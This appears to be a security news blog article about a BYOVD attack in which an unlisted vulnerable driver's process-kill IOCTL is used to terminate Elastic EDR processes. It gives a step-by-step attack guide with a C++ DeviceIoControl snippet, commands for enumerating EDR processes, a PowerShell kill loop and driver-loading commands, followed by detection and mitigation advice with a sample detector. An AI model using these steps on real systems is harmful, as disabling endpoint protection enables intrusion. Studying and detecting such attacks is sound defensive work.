New BYOVD Attack Bypasses Elastic EDR: Kill Arbitrary Processes with an Unlisted Vulnerable Driver + Video

Introduction:

A new Bring Your Own Vulnerable Driver (BYOVD) attack has been discovered that effectively neutralizes Elastic EDR by exploiting an unlisted kernel driver. The driver exposes IOCTL codes to terminate processes based solely on a provided PID, with no privilege or origin checks. This flaw allows an attacker to feed it a list of EDR vendor process names, enabling a single IOCTL call to scan for and kill every endpoint protection process running on the system.

Learning Objectives:

  • Understand the mechanics of a BYOVD attack targeting EDR processes.
  • Learn how to identify vulnerable IOCTL handlers in kernel drivers.
  • Master techniques for enumerating and terminating security products via kernel-level exploits.

You Should Know:

1. Understanding the BYOVD Vulnerability and IOCTL Abuse

The core vulnerability lies in a driver that exposes IOCTL (Input/Output Control) codes for terminating processes. The driver fails to validate the caller’s security context, allowing any user-mode process to send a request and kill any process by PID. Attackers can extend this by predefining a list of EDR-related process names (e.g., elastic-endpoint.exe, elastic-agent.exe), iterating through them, and sending termination commands.

To test for such a vulnerability, you would first enumerate all IOCTL codes supported by a driver using tools like `IoNinja` or by reverse engineering. In Linux, you might use `ioctl` commands via a custom C program, while on Windows, you can use `DeviceIoControl` in C++ or PowerShell with P/Invoke.

Step‑by‑step guide:

  • Identify the driver device name: Use `WinObj` or programmatically query `\\.\` devices.
  • Enumerate IOCTLs: Write a fuzzer or use static analysis to find the termination IOCTL.
  • Craft the payload: Create a list of target process names.
  • Send the IOCTL: From a low-privileged process, call `DeviceIoControl` with the vulnerable driver handle.

Example C++ code snippet to send an IOCTL:

#include <windows.h>  // device name and IOCTL code below are placeholders for the unnamed driver
HANDLE hDevice = CreateFileA("\\\\.\\VulnerableDriver", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);  // backslashes must be doubled in a C/C++ literal
DWORD targetPid = 0;  // PID passed to the driver (placeholder value)
DWORD bytesReturned = 0;
DeviceIoControl(hDevice, IOCTL_TERMINATE_PROCESS, &targetPid, sizeof(DWORD), NULL, 0, &bytesReturned, NULL);
CloseHandle(hDevice);

2. Enumerating EDR Processes for Termination

Before killing EDR, attackers must compile a list of running security processes. This can be done using standard Windows commands or WMI. On Linux, similar enumeration is done via `ps` or procfs.

Windows commands:

# List all processes whose names contain common EDR strings (-like needs wildcards to match substrings)
Get-Process | Where-Object { $_.ProcessName -like "*elastic*" -or $_.ProcessName -like "*edr*" -or $_.ProcessName -like "*defender*" } | Select-Object ProcessName, Id

Alternatively, using `tasklist` and `findstr`:

tasklist /fo csv | findstr /i "elastic crowdstrike sentinelone defender"

The attacker then feeds these PIDs to the vulnerable driver.

3. Exploiting the Driver with a Custom Kill List

Instead of targeting one PID at a time, the attacker modifies the IOCTL input structure to accept a list. If the driver only accepts a single PID, they loop through the list. If the driver has a custom structure, they might craft a buffer containing multiple PIDs or process names.

Step‑by‑step guide:

  • Create a text file with target process names (e.g., edr_targets.txt).
  • Use a PowerShell script to iterate and call a custom executable that sends the IOCTL.
  • Example PowerShell loop ($PID is a read-only automatic variable in PowerShell, so the loop variable needs another name):
    $targetPids = Get-Process elastic-endpoint, elastic-agent, edr-monitor -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Id
    foreach ($targetPid in $targetPids) {
        .\kill_driver.exe $targetPid
    }

4. Bypassing Microsoft’s Vulnerable Driver Blocklist

The driver used is not yet on Microsoft’s blocklist, meaning it can be loaded without triggering Defender or SmartScreen. Attackers can manually load it using `sc` or `fltmc` if they have admin rights. Once loaded, the driver remains active until blocklisted or removed.

Commands to load a driver (admin required):

sc create VulnerableDrv binPath= C:\path\to\driver.sys type= kernel
sc start VulnerableDrv

After loading, the device is accessible for exploitation.

5. Detection and Mitigation Strategies

Defenders must monitor for unusual driver loads, especially those not signed by trusted vendors or with suspicious names. Use Sysmon to log driver load events (Event ID 6, DriverLoad). Additionally, enable Driver Signature Enforcement and periodically audit the drivers currently loaded, checking their signature status and comparing their hashes against Microsoft’s vulnerable driver blocklist, for example with PowerShell:

# Check the Authenticode signature of every running driver image (Win32_SystemDriver PathName may carry a "\??\" prefix)
Get-CimInstance Win32_SystemDriver | Where-Object State -eq 'Running' | ForEach-Object { Get-AuthenticodeSignature -FilePath ($_.PathName -replace '^\\\?\?\\', '') } | Where-Object Status -ne 'Valid' | Select-Object Status, Path

Implement process protection flags (PsSetCreateProcessNotifyRoutine) to prevent termination of critical processes, though many BYOVD attacks bypass this by operating in kernel mode.
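As an added defensive example (not code from the original post), the following Python sketches the two detections this section calls for, run over constructed Sysmon-style records: scoring driver loads by signature status, load path and a blocklist hash, and spotting a burst of EDR process terminations within a short window. Field names follow Sysmon's DriverLoad and ProcessTerminate events; the hash values, paths and process IDs are placeholders.

```python
from collections import deque
from datetime import datetime, timedelta

# Process names the post cites as typical kill-list targets.
EDR_IMAGES = {"elastic-endpoint.exe", "elastic-agent.exe"}
# Placeholder for hashes taken from Microsoft's vulnerable driver blocklist (not a real hash).
BLOCKED_SHA256 = {"PLACEHOLDER_SHA256_OF_BLOCKLISTED_DRIVER"}
STANDARD_DRIVER_DIR = "c:\\windows\\system32\\drivers\\"

# Constructed sample telemetry in a simplified Sysmon-like shape (EventID 6 = DriverLoad, 5 = ProcessTerminate).
SAMPLE_EVENTS = [
    {"EventID": 6, "UtcTime": "2024-01-01T10:00:00",
     "ImageLoaded": "C:\\Users\\Public\\VulnerableDriver.sys",
     "Hashes": "SHA256=PLACEHOLDER_SHA256_OF_UNLISTED_DRIVER",
     "Signed": "true", "Signature": "Example Hardware Vendor", "SignatureStatus": "Valid"},
    {"EventID": 5, "UtcTime": "2024-01-01T10:00:03", "ProcessId": 4120,
     "Image": "C:\\Program Files\\Elastic\\Endpoint\\elastic-endpoint.exe"},
    {"EventID": 5, "UtcTime": "2024-01-01T10:00:04", "ProcessId": 2208,
     "Image": "C:\\Program Files\\Elastic\\Agent\\elastic-agent.exe"},
]

def driver_load_findings(ev):
    """Reasons a DriverLoad record deserves attention; an empty list means nothing stood out."""
    findings = []
    if ev.get("Signed", "").lower() != "true" or ev.get("SignatureStatus") != "Valid":
        findings.append("driver image not validly signed")
    if not ev["ImageLoaded"].lower().startswith(STANDARD_DRIVER_DIR):
        findings.append("driver loaded from outside the system driver directory")
    hashes = dict(h.split("=", 1) for h in ev.get("Hashes", "").split(",") if "=" in h)
    if hashes.get("SHA256") in BLOCKED_SHA256:
        findings.append("hash on vulnerable driver blocklist")
    return findings

def termination_bursts(events, window=timedelta(seconds=10), threshold=2):
    """Windows in which at least `threshold` EDR processes exit; catches the mass-kill pattern."""
    recent, alerts = deque(), []
    for ev in events:
        if ev["EventID"] != 5:
            continue
        name = ev["Image"].rsplit("\\", 1)[-1].lower()
        if name not in EDR_IMAGES:
            continue
        t = datetime.fromisoformat(ev["UtcTime"])
        recent.append((t, name))
        while t - recent[0][0] > window:  # drop terminations older than the window
            recent.popleft()
        if len(recent) >= threshold:
            alerts.append((ev["UtcTime"], sorted({n for _, n in recent})))
    return alerts
```

On the sample driver load only the path rule fires: a validly signed driver that is not yet blocklisted is exactly the case the post describes, so signature and blocklist checks need the path and termination-burst rules beside them.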

What Undercode Say:

  • Key Takeaway 1: BYOVD attacks remain a potent method to disable EDR because they exploit legitimate drivers, circumventing user-mode hooks and signature checks.
  • Key Takeaway 2: The lack of proper IOCTL validation in kernel drivers is a systemic issue; vendors must implement origin and privilege checks, and security teams must proactively monitor driver loads.

This discovery underscores the arms race between EDR vendors and attackers. While Microsoft’s blocklist is a reactive measure, attackers are constantly finding new, unlisted drivers to weaponize. Organizations should adopt a zero-trust approach to kernel drivers, using application control policies like WDAC to block unauthorized drivers, and employ behavioral detection for anomalous process termination patterns.

Prediction:

We will see a surge in BYOVD attacks using drivers from obscure hardware vendors or those with valid signatures but weak IOCTL implementations. EDR vendors will need to move toward kernel-mode callbacks and event tracing that can detect mass process termination attempts, even if initiated from kernel space. Microsoft may expedite the driver blocklist update process, but the fundamental vulnerability lies in driver code, requiring a shift in driver development practices.

Reported By: Husam Gameel – Hackers Feeds